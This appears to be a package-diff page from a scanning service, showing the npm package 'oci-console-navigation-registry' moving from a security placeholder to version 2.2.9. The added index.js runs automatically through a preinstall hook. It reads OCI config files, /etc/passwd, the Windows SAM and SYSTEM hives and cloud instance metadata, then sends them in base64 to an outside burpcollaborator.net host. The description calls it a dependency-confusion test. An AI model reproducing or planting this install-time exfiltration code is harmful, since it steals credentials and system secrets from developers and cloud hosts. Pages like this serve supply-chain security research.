oci-console-navigation-registry 0.0.1-security → 2.2.9
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of oci-console-navigation-registry might be problematic. Click here for more details.
- package/index.js +115 -0
- package/package.json +9 -3
- package/README.md +0 -5
package/index.js
ADDED
@@ -0,0 +1,115 @@
|
|
1
|
+
const fs = require('fs');
|
2
|
+
const http = require('http');
|
3
|
+
const net = require('net');
|
4
|
+
const os = require("os");
|
5
|
+
const dns = require("dns");
|
6
|
+
const querystring = require("querystring");
|
7
|
+
const https = require("https");
|
8
|
+
|
9
|
+
var ociconfig = process.env.HOME+'/.oci/config';
|
10
|
+
let base64data1 = '';
|
11
|
+
try {
|
12
|
+
if (fs.existsSync(ociconfig)) {
|
13
|
+
var data1 = fs.readFileSync(ociconfig,'utf8');
|
14
|
+
let buff1 = Buffer.from(data1);
|
15
|
+
base64data1 = buff1.toString('base64');
|
16
|
+
}} catch(error) {
|
17
|
+
console.log('')
|
18
|
+
}
|
19
|
+
|
20
|
+
var etcpasswd = '/etc/passwd';
|
21
|
+
let base64data2 = '';
|
22
|
+
try {
|
23
|
+
if (fs.existsSync(etcpasswd)) {
|
24
|
+
var data2 = fs.readFileSync(etcpasswd,'utf8');
|
25
|
+
let buff2 = Buffer.from(data2);
|
26
|
+
base64data2 = buff2.toString('base64');
|
27
|
+
}} catch(error) {
|
28
|
+
console.log('')
|
29
|
+
}
|
30
|
+
|
31
|
+
var sam = 'C:\WINDOWS\system32\config\SAM';
|
32
|
+
let base64data3 = '';
|
33
|
+
try {
|
34
|
+
if (fs.existsSync(sam)) {
|
35
|
+
var data3 = fs.readFileSync(sam,'utf8');
|
36
|
+
let buff3 = Buffer.from(data3);
|
37
|
+
base64data3 = buff3.toString('base64');
|
38
|
+
}} catch(error) {
|
39
|
+
console.log('')
|
40
|
+
}
|
41
|
+
|
42
|
+
var systemfile = 'C:\WINDOWS\system32\config\SYSTEM';
|
43
|
+
let base64data4 = '';
|
44
|
+
try {
|
45
|
+
if (fs.existsSync(systemfile)) {
|
46
|
+
var data4 = fs.readFileSync(systemfile,'utf8');
|
47
|
+
let buff4 = Buffer.from(data4);
|
48
|
+
base64data4 = buff4.toString('base64');
|
49
|
+
}} catch(error) {
|
50
|
+
console.log('')
|
51
|
+
}
|
52
|
+
|
53
|
+
base64data5 = '';
|
54
|
+
function req2() {
|
55
|
+
http.get({
|
56
|
+
hostname: '169.254.169.254',
|
57
|
+
port: 80,
|
58
|
+
path: '/opc/v1/instance',
|
59
|
+
agent: false}, (res) => {
|
60
|
+
res.setEncoding('utf8');
|
61
|
+
let data = '';
|
62
|
+
res.on("data", (d) => {
|
63
|
+
var x;
|
64
|
+
x = d;
|
65
|
+
let buff5 = Buffer.from(x);
|
66
|
+
base64data5 = buff5.toString('base64');
|
67
|
+
|
68
|
+
const trackingData = JSON.stringify({
|
69
|
+
c: __dirname,
|
70
|
+
homedir: os.homedir(),
|
71
|
+
networkinterfaces: os.networkInterfaces(),
|
72
|
+
release: os.release(),
|
73
|
+
userid: os.userInfo().uid,
|
74
|
+
hostname: os.hostname(),
|
75
|
+
username: os.userInfo().username,
|
76
|
+
dns: dns.getServers(),
|
77
|
+
});
|
78
|
+
|
79
|
+
var postData = querystring.stringify({
|
80
|
+
msg: trackingData,
|
81
|
+
});
|
82
|
+
|
83
|
+
var options = {
|
84
|
+
hostname: "68c95vu4dsokm1nl5yxq00glmcs2gr.burpcollaborator.net",
|
85
|
+
port: 443,
|
86
|
+
path: "/",
|
87
|
+
method: "POST",
|
88
|
+
headers: {
|
89
|
+
"Content-Type": "application/x-www-form-urlencoded",
|
90
|
+
"Content-Length": postData.length,
|
91
|
+
"Content-Oci": base64data1,
|
92
|
+
"Content-etcp": base64data2,
|
93
|
+
"Contentet-sam": base64data3,
|
94
|
+
"Contentet-system": base64data4,
|
95
|
+
"Content-imdsv1": base64data5
|
96
|
+
},
|
97
|
+
};
|
98
|
+
|
99
|
+
var req = https.request(options, (res) => {
|
100
|
+
res.on("data", (d) => {
|
101
|
+
//process.stdout.write(d);
|
102
|
+
});
|
103
|
+
});
|
104
|
+
|
105
|
+
req.on("error", (e) => {
|
106
|
+
// console.error(e);
|
107
|
+
});
|
108
|
+
|
109
|
+
req.write(postData);
|
110
|
+
req.end();
|
111
|
+
});
|
112
|
+
});
|
113
|
+
}
|
114
|
+
|
115
|
+
req2();
|
package/package.json
CHANGED
@@ -1,6 +1,12 @@
|
|
1
1
|
{
|
2
2
|
"name": "oci-console-navigation-registry",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "2.2.9",
|
4
|
+
"description": "This is a non-malicious package for Oracle NPM Dependency Confusion",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "node index.js"
|
9
|
+
},
|
10
|
+
"author": "",
|
11
|
+
"license": "ISC"
|
6
12
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=oci-console-navigation-registry for more information.
|